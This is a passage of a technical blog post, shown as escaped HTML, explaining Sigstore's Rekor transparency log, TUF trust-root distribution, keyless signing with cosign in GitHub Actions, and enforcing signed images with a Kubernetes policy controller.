      &lt;/span&gt;&lt;span class="nl"&gt;"content"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"MEUCIQDx...(base64 encoded signature)..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"publicKey"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"content"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"LS0tLS1C...(base64 encoded Fulcio cert)..."&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Rekor also slaps on server-side metadata:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;What it is&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;logIndex&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The sequential index in the log (0, 1, 2, ...)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;integratedTime&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The UNIX timestamp when Rekor added the entry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;logID&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The ID of the log shard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;verification.inclusionProof&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The Merkle Inclusion Proof (array of hashes + Root Hash)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;verification.signedEntryTimestamp&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The timestamp signed by Rekor's private key&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;This &lt;code&gt;integratedTime&lt;/code&gt; and &lt;code&gt;signedEntryTimestamp&lt;/code&gt; are your temporal proof. Even after the Fulcio certificate dies 10 minutes later, &lt;strong&gt;Rekor's immutable ledger will forever testify that "at that specific moment, this cert was valid."&lt;/strong&gt; This is the magic trick that lets us throw our keys away.&lt;/p&gt;

&lt;h3&gt;
  
  
  Rekor v2: The Next-Gen Tessera Architecture
&lt;/h3&gt;

&lt;p&gt;Rekor v1 ran on Google's Trillian (the exact same backend used for Certificate Transparency) backed by MariaDB. However, &lt;strong&gt;Rekor v2&lt;/strong&gt;, which went GA in October 2025, completely swapped out the backend for &lt;strong&gt;Trillian-Tessera&lt;/strong&gt; (a tile-based transparency log implementation).&lt;/p&gt;

&lt;p&gt;Key changes from v1 to v2:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;v1&lt;/th&gt;
&lt;th&gt;v2&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Backend&lt;/td&gt;
&lt;td&gt;Trillian + MariaDB&lt;/td&gt;
&lt;td&gt;Tessera (Tile-based)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supported Types&lt;/td&gt;
&lt;td&gt;11 types (&lt;code&gt;hashedrekord&lt;/code&gt;, &lt;code&gt;dsse&lt;/code&gt;, &lt;code&gt;intoto&lt;/code&gt;, etc.)&lt;/td&gt;
&lt;td&gt;Only &lt;code&gt;hashedrekord&lt;/code&gt; and &lt;code&gt;dsse&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;API&lt;/td&gt;
&lt;td&gt;Multiple endpoints&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;POST /api/v2/log/entries&lt;/code&gt; only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reads&lt;/td&gt;
&lt;td&gt;Processed by server&lt;/td&gt;
&lt;td&gt;Highly cacheable via CDN&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Witnessing&lt;/td&gt;
&lt;td&gt;Dependent on external systems&lt;/td&gt;
&lt;td&gt;Natively embedded&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Timestamps&lt;/td&gt;
&lt;td&gt;Generated by Rekor&lt;/td&gt;
&lt;td&gt;Sourced from a separate Timestamp Authority&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URLs&lt;/td&gt;
&lt;td&gt;Single URL&lt;/td&gt;
&lt;td&gt;Sharded (&lt;code&gt;logYEAR-rev.rekor.sigstore.dev&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Rekor v1 will continue running concurrently, with a 1-year deprecation notice before it is frozen. Clients (Cosign v2.6.0+) automatically shift to v2 based on the &lt;code&gt;SigningConfig&lt;/code&gt; and &lt;code&gt;TrustedRoot&lt;/code&gt; distributed via TUF.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hands-on: Querying Rekor
&lt;/h3&gt;

&lt;p&gt;Let's pull the signature from our previous article straight out of Rekor.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install rekor-cli&lt;/span&gt;
brew &lt;span class="nb"&gt;install &lt;/span&gt;rekor-cli

&lt;span class="c"&gt;# Check the state of the log&lt;/span&gt;
rekor-cli loginfo
&lt;span class="c"&gt;# Verification Successful!&lt;/span&gt;
&lt;span class="c"&gt;# Tree Size: 161024891&lt;/span&gt;
&lt;span class="c"&gt;# Root Hash: 5a4b...&lt;/span&gt;

&lt;span class="c"&gt;# Search for entries signed by your email&lt;/span&gt;
rekor-cli search &lt;span class="nt"&gt;--email&lt;/span&gt; you@example.com
&lt;span class="c"&gt;# Found matching entries (listed by UUID):&lt;/span&gt;
&lt;span class="c"&gt;# 24296fb24b8ad77a...&lt;/span&gt;

&lt;span class="c"&gt;# Fetch the raw entry data&lt;/span&gt;
rekor-cli get &lt;span class="nt"&gt;--uuid&lt;/span&gt; 24296fb24b8ad77a...
&lt;span class="c"&gt;# LogID: c0d23d6ad406973f...&lt;/span&gt;
&lt;span class="c"&gt;# Attestation:&lt;/span&gt;
&lt;span class="c"&gt;# Index: 95829475&lt;/span&gt;
&lt;span class="c"&gt;# IntegratedTime: 2026-01-11T12:34:56Z&lt;/span&gt;
&lt;span class="c"&gt;# UUID: 24296fb24b8ad77a...&lt;/span&gt;
&lt;span class="c"&gt;# Body: {&lt;/span&gt;
&lt;span class="c"&gt;#   "HashedRekordObj": {&lt;/span&gt;
&lt;span class="c"&gt;#     "data": { "hash": { "algorithm": "sha256", "value": "..." } },&lt;/span&gt;
&lt;span class="c"&gt;#     "signature": { "content": "...", "publicKey": { "content": "..." } }&lt;/span&gt;
&lt;span class="c"&gt;#   }&lt;/span&gt;
&lt;span class="c"&gt;# }&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Your signature is immortalized in a public log. Since anyone in the world can read it, if an attacker somehow bypasses OIDC and signs something using your identity, you will spot the anomaly simply by monitoring the ledger.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. TUF: Defending the Root of Trust
&lt;/h2&gt;

&lt;p&gt;Everything we've discussed relies on a single, terrifying assumption: &lt;strong&gt;"The Fulcio Root CA and the Rekor public key are authentic."&lt;/strong&gt; If an attacker swaps those out, the entire house of cards collapses instantly.&lt;/p&gt;

&lt;p&gt;Safely distributing this "Trust Root" is the job of &lt;strong&gt;TUF (The Update Framework)&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why the Naive Approach Fails
&lt;/h3&gt;

&lt;p&gt;You might think, "Just hardcode the root cert into the Cosign binary!" But that's a trap for two reasons:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Forced binary updates for key rotation.&lt;/strong&gt; Every time Fulcio rotates its Root CA, every single user globally would have to re-download and reinstall Cosign.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CDN compromise leads to total takeover.&lt;/strong&gt; If the download server gets hacked, attackers just ship a modified binary with their own root cert. Game over.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;TUF is a framework specifically engineered to mathematically defeat rollback attacks, freeze attacks, mix-and-match attacks, arbitrary software attacks, and total-collapse-via-single-key compromises.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Four Roles of TUF
&lt;/h3&gt;

&lt;p&gt;TUF structures its chain of trust using four metadata files (roles).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1qcjjaf240opeqnw5wza.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1qcjjaf240opeqnw5wza.png" alt="TUF" width="800" height="674"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's how they interact:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;root.json&lt;/strong&gt;: The absolute god-key. It defines the public keys for all other roles and their threshold signatures (e.g., 3-of-5).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;targets.json&lt;/strong&gt;: Records the hashes and sizes of the actual files we want (&lt;code&gt;trusted_root.json&lt;/code&gt;, &lt;code&gt;fulcio.crt.pem&lt;/code&gt;, &lt;code&gt;rekor.pub&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;snapshot.json&lt;/strong&gt;: Locks down the exact versions of the targets. This stops attackers from mixing an old &lt;code&gt;targets.json&lt;/code&gt; with a new &lt;code&gt;root.json&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;timestamp.json&lt;/strong&gt;: Updated constantly with a very short lifespan. This physically prevents attackers from feeding you stale metadata and claiming it's fresh.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Root Key Ceremony: Forging Trust in Public
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;root.json&lt;/code&gt; is the single most critical file in Sigstore's security model. It is signed during a highly-orchestrated public event called the &lt;strong&gt;Key Ceremony&lt;/strong&gt;. The first one in June 2021 was literally live-streamed on CloudNative.tv.&lt;/p&gt;

&lt;p&gt;Five trusted keyholders take physical hardware security keys and perform a 3-of-5 threshold signature to mint the &lt;code&gt;root.json&lt;/code&gt;. The entire process is recorded, audited, and committed to the &lt;code&gt;sigstore/root-signing&lt;/code&gt; repo. Unless an attacker physically robs three keyholders at gunpoint simultaneously, &lt;code&gt;root.json&lt;/code&gt; cannot be forged.&lt;/p&gt;

&lt;h3&gt;
  
  
  Bootstrapping: Establishing Trust on First Run
&lt;/h3&gt;

&lt;p&gt;Cosign ships with a very old, foundational &lt;code&gt;root.json&lt;/code&gt; hardcoded into the binary. On the first run, it executes the following protocol to safely fetch the latest Trust Root.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3kvg71vm274lb8ujeq89.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3kvg71vm274lb8ujeq89.png" alt="boostrap" width="544" height="911"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The genius here is the &lt;strong&gt;chained verification of &lt;code&gt;root.json&lt;/code&gt;&lt;/strong&gt;. Version N is explicitly verified by the keys from Version N-1. This means Sigstore can continuously rotate its root keys without forcing you to update your CLI binary. If the CDN is compromised and serves a bogus &lt;code&gt;root.json&lt;/code&gt;, your client instantly rejects it because the previous key's signature won't match.&lt;/p&gt;

&lt;p&gt;The final payload, &lt;code&gt;trusted_root.json&lt;/code&gt;, hands you everything you need—Fulcio's CA chain, Rekor's key, CT Log keys—safely and securely.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. The Full Flow: Deconstructing &lt;code&gt;cosign sign&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;Now that we understand the trinity of Fulcio, Rekor, and TUF, let's look at exactly what happens when you type &lt;code&gt;cosign sign $IMAGE&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fschm0zr48xg5tgntl52t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fschm0zr48xg5tgntl52t.png" alt="sequence" width="800" height="523"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Side Note: What "Signing a Container" Actually Means
&lt;/h3&gt;

&lt;p&gt;Let's clear up a massive misconception. "Signing an image" does &lt;strong&gt;not&lt;/strong&gt; mean injecting signature data inside the container image or its metadata.&lt;/p&gt;

&lt;p&gt;If you modify the container image to append a signature, the image's hash (digest) instantly changes, invalidating the signature you just applied. It's a fatal &lt;strong&gt;chicken-and-egg problem&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Cosign bypasses this using a &lt;strong&gt;Detached Signature&lt;/strong&gt; approach:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;It calculates the hash of the pristine image manifest (Step 4).&lt;/li&gt;
&lt;li&gt;It takes the resulting signature data, and instead of cramming it into the image, it &lt;strong&gt;pushes it back to the exact same registry, right next to the original image, disguised as a dummy OCI Artifact with a &lt;code&gt;.sig&lt;/code&gt; tag&lt;/strong&gt; (Step 6).
&lt;em&gt;Note: The latest OCI v1.1 spec added the Referrers API, allowing manifests to link to each other directly without relying on ugly &lt;code&gt;.sig&lt;/code&gt; tags.&lt;/em&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Signing a container literally just means &lt;strong&gt;"creating cryptographic proof of its hash and sliding it quietly onto the shelf next to the original."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The private key only exists in RAM for the few seconds between Step 1 and Step 7. Once it's nuked, nobody in the universe—not even you—can ever sign anything with it again.&lt;/p&gt;

&lt;p&gt;When you verify it, you don't use a key; you use an &lt;strong&gt;identity&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &lt;span class="nv"&gt;$IMAGE&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"you@gmail.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://accounts.google.com"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here's the verification logic:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pull the signature manifest (the &lt;code&gt;.sig&lt;/code&gt; tag) from the registry.&lt;/li&gt;
&lt;li&gt;Extract the signature, the Fulcio cert, and the Rekor log entry.&lt;/li&gt;
&lt;li&gt;Validate the cert chain up to the Fulcio Root CA (which we got from TUF).&lt;/li&gt;
&lt;li&gt;Verify Rekor's &lt;code&gt;integratedTime&lt;/code&gt; falls inside the cert's 10-minute validity window.&lt;/li&gt;
&lt;li&gt;Confirm the cert's SAN exactly matches &lt;code&gt;--certificate-identity&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Confirm the cert's Issuer OID matches &lt;code&gt;--certificate-oidc-issuer&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Use the public key embedded in the cert to mathematically verify the image digest signature.&lt;/li&gt;
&lt;li&gt;Verify Rekor's Inclusion Proof using Rekor's public key (from TUF).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If all checks pass, you have irrefutable cryptographic proof that "This exact image was signed by this specific identity, authenticated by this specific OIDC provider, at that exact point in time."&lt;/p&gt;




&lt;h2&gt;
  
  
  7. GitHub Actions Integration: Total Automation
&lt;/h2&gt;

&lt;p&gt;Where this architecture truly screams is inside a CI/CD pipeline. GitHub Actions natively provides its own OIDC Provider (&lt;code&gt;https://token.actions.githubusercontent.com&lt;/code&gt;). Cosign automatically detects it, bypasses the browser popup, and executes a fully headless keyless signing flow.&lt;/p&gt;

&lt;h3&gt;
  
  
  Workflow Configuration
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Build and Sign&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;push&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;branches&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;main&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;build-sign&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;    &lt;span class="c1"&gt;# Required to mint the OIDC token&lt;/span&gt;
      &lt;span class="na"&gt;packages&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;    &lt;span class="c1"&gt;# Required to push to GHCR&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;

    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sigstore/cosign-installer@v3&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Login to GHCR&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;docker/login-action@v3&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;registry&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ghcr.io&lt;/span&gt;
          &lt;span class="na"&gt;username&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.actor }}&lt;/span&gt;
          &lt;span class="na"&gt;password&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ secrets.GITHUB_TOKEN }}&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Build and Push&lt;/span&gt;
        &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;build-push&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;IMAGE="ghcr.io/${{ github.repository }}:${{ github.sha }}"&lt;/span&gt;
          &lt;span class="s"&gt;docker build -t "$IMAGE" .&lt;/span&gt;
          &lt;span class="s"&gt;docker push "$IMAGE"&lt;/span&gt;
          &lt;span class="s"&gt;DIGEST=$(docker inspect --format='{{index .RepoDigests 0}}' "$IMAGE")&lt;/span&gt;
          &lt;span class="s"&gt;echo "digest=$DIGEST" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Sign with Cosign (keyless)&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cosign sign --yes ${{ steps.build-push.outputs.digest }}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Adding &lt;code&gt;permissions.id-token: write&lt;/code&gt; is all it takes. Cosign detects it's running inside CI, grabs the token, and does its job.&lt;/p&gt;

&lt;h3&gt;
  
  
  Verifying the CI Signature
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &lt;span class="se"&gt;\&lt;/span&gt;
  ghcr.io/myorg/myrepo@sha256:abc123... &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/myorg/myrepo/.github/workflows/build.yml@refs/heads/main"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://token.actions.githubusercontent.com"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This verification command guarantees one thing: &lt;strong&gt;"This image was irrefutably built and signed by the build.yml workflow inside the myorg/myrepo repository, triggered from the main branch."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feiz4ijmqoovwnmfjlxqy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feiz4ijmqoovwnmfjlxqy.png" alt="verify" width="472" height="802"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  8. Kubernetes Policy Controller: Forcing the Rules
&lt;/h2&gt;

&lt;p&gt;Once you can sign things, the next logical step is "refuse to deploy anything that isn't signed." While I showed off Kyverno in the last article, the Sigstore project natively maintains the &lt;strong&gt;Policy Controller&lt;/strong&gt;, a dedicated Admission Webhook.&lt;/p&gt;

&lt;h3&gt;
  
  
  How It Works
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdvgaj22dnmqbujgsk9su.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdvgaj22dnmqbujgsk9su.png" alt="How it Works" width="800" height="418"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Setup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install Policy Controller&lt;/span&gt;
helm repo add sigstore https://sigstore.github.io/helm-charts
helm &lt;span class="nb"&gt;install &lt;/span&gt;policy-controller sigstore/policy-controller &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-n&lt;/span&gt; cosign-system &lt;span class="nt"&gt;--create-namespace&lt;/span&gt;

&lt;span class="c"&gt;# Opt-in your target namespace&lt;/span&gt;
kubectl label namespace default policy.sigstore.dev/include&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ClusterImagePolicy: Defining the Law
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;policy.sigstore.dev/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClusterImagePolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;require-github-actions-signed&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;images&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;glob&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ghcr.io/myorg/**"&lt;/span&gt;
  &lt;span class="na"&gt;authorities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;keyless&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;url&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://fulcio.sigstore.dev&lt;/span&gt;
        &lt;span class="na"&gt;identities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;issuer&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://token.actions.githubusercontent.com"&lt;/span&gt;
          &lt;span class="na"&gt;subject&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://github.com/myorg/myrepo/.github/workflows/build.yml@refs/heads/main"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



